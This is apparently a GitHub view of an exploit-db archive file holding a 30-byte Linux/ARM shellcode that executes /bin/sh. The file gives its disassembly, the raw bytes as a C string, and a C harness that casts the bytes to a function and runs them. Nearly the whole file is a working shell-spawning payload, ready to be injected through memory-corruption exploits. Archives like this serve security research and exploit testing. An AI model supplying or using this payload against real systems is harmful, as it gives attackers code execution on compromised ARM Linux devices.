forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy path21253.asm
More file actions
executable file
·42 lines (39 loc) · 1.27 KB
/
Copy path21253.asm
File metadata and controls
executable file
·42 lines (39 loc) · 1.27 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
/*
Title: Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 30 bytes
Date: 2012-09-08
Tested on: ARM1176JZF-S (v6l)
Author: midnitesnake
00008054 <_start>:
8054: e28f6001 add r6, pc, #1
8058: e12fff16 bx r6
805c: 4678 mov r0, pc
805e: 300a adds r0, #10
8060: 9001 str r0, [sp, #4]
8062: a901 add r1, sp, #4
8064: 1a92 subs r2, r2, r2
8066: 270b movs r7, #11
8068: df01 svc 1
806a: 2f2f .short 0x2f2f
806c: 2f6e6962 .word 0x2f6e6962
8070: 00006873 .word 0x00006873
*/
#include <stdio.h>
char *SC = "\x01\x60\x8f\xe2"
"\x16\xff\x2f\xe1"
"\x78\x46"
"\x0a\x30"
"\x01\x90"
"\x01\xa9"
"\x92\x1a"
"\x0b\x27"
"\x01\xdf"
"\x2f\x2f"
"\x62\x69"
"\x6e\x2f"
"\x73\x68\x00\x00";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}